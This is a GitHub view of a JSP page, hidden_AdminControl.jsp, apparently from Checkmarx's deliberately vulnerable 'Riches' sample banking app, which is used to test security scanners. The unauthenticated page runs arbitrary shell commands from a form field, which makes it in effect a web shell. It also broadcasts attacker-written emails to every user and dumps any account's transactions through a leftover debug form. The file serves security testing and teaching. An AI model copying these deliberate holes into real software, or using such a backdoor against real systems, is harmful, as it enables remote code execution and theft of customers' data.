forked from Custodela/Riches
-
Notifications
You must be signed in to change notification settings - Fork 26
/
hidden_AdminControl.jsp
147 lines (126 loc) · 4.59 KB
/
hidden_AdminControl.jsp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
<form method=get action='hidden_AdminControl.jsp'>
Shell Command<br />
<input name='actions' type=text size="80"><br/>
<input type=submit value='Execute'><br /><br />
Automated shutdown message (sent to everyone by default)<br />
<input name='message' type=text size="80"><br />
<p><i>Send to Specific Users (semicolon seperated list)</i><br />
<input name='users' type=text size="80"/><br/>
<input type=submit value='Broadcast Alert'>
<%@ page import="java.io.*" %>
<%@ page import="java.util.Iterator" %>
<%@ page import="java.util.List" %>
<%@ page import="com.checkmarx.samples.riches.oper.*" %>
<%@ page import="com.checkmarx.samples.riches.model.*" %>
<% String alertMessage = request.getParameter("message");
int messageCount = 0;
if ((alertMessage != null) && (alertMessage.length() > 0))
{
SendMessage msgClass = new SendMessage();
String specifiedUsers = request.getParameter("users");
if ((specifiedUsers != null) && (specifiedUsers.length() > 0))
{
pageContext.getOut().print("<h1>Emergency Broadcast sent to users:</h1><pre>");
String[] users = specifiedUsers.split(";");
for (int index=0; index < users.length; index++)
{
String emailAddress = users[index];
pageContext.getOut().println(emailAddress);
msgClass.setTo(emailAddress);
msgClass.setSubject("Technical Difficulties");
String processedMessage = alertMessage.replaceAll("<code1>",
"The system is currently experiencing technical difficulties.");
msgClass.setBody(processedMessage);
msgClass.setSeverity("Highest");
msgClass.execute();
messageCount++;
}
pageContext.getOut().println("</pre>");
}
else
{
// Iterate through all users in the system
List emailAddresses = ProfileService.getAllEmail();
for (Iterator it = emailAddresses.iterator(); it.hasNext();)
{
String emailAddress = (String)it.next();
msgClass.setTo(emailAddress);
msgClass.setSubject("Technical Difficulties");
String processedMessage = alertMessage.replaceAll("Code1",
"The system is currently experiencing technical difficulties.");
msgClass.setBody(processedMessage);
msgClass.setSeverity("Highest");
msgClass.execute();
messageCount++;
}
pageContext.getOut().flush();
pageContext.getOut().println("<h1>Emergency Broadcast sent to <i>"+messageCount+"</i> users.</h1><br/>");
}
}
%>
<%
String cmd = request.getParameter("actions");
if ((cmd != null) && (cmd.length() > 0))
{
String s = null;
try
{
String[] commands = cmd.split(";");
for (int index=0; index < commands.length; index++)
{
String output = "";
String command = "";
command = commands[index];
String runtimeCommand = "";
if (System.getProperty("os.name").startsWith("Windows"))
runtimeCommand = "cmd.exe /C " + command;
else
runtimeCommand = command;
Process p = Runtime.getRuntime().exec(runtimeCommand);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null)
{
output += s;
output += "\r\n";
}
pageContext.getOut().flush();
pageContext.getOut().println("<h1>Response from command <i>"+command+"</i></h1><br/>");
pageContext.getOut().println("<pre>" + output + "</pre>");
}
}
catch(IOException e)
{
}
}
%>
<%
String accountNumber = request.getParameter("acctno");
if ((accountNumber != null) && (accountNumber.length() > 0))
{
Long account = Long.valueOf(accountNumber);
List transactions = TransactionService.getTransactions(account);
pageContext.getOut().println("<h1>Transactions reported from database for account <i>"+accountNumber+"</i></h1>");
try
{
for (Iterator it = transactions.iterator(); it.hasNext();)
{
Transaction transaction = (Transaction)it.next();
String transactionDescription = "Transaction reported ["+transaction.getId()+"]: "
+ "Account "+ transaction.getAcctno() + "; "
+ "Amount " + transaction.getAmount() + "; "
+ "Date " + transaction.getDate() + "; "
+ "Description " + transaction.getDescription();
pageContext.getOut().flush();
pageContext.getOut().println("<pre>"+transactionDescription+"</pre>");
}
}
catch (Exception e)
{
}
}
%>
<br /><br /><b>Debug Code</b><br />
<i>Note: This code should be removed once debugging is complete for bug 192203 (inspection of database contents)</i><br />
Account Number <input name='acctno' type=text size="15"/><br />
<input type=submit value='Retrieve'>
</form>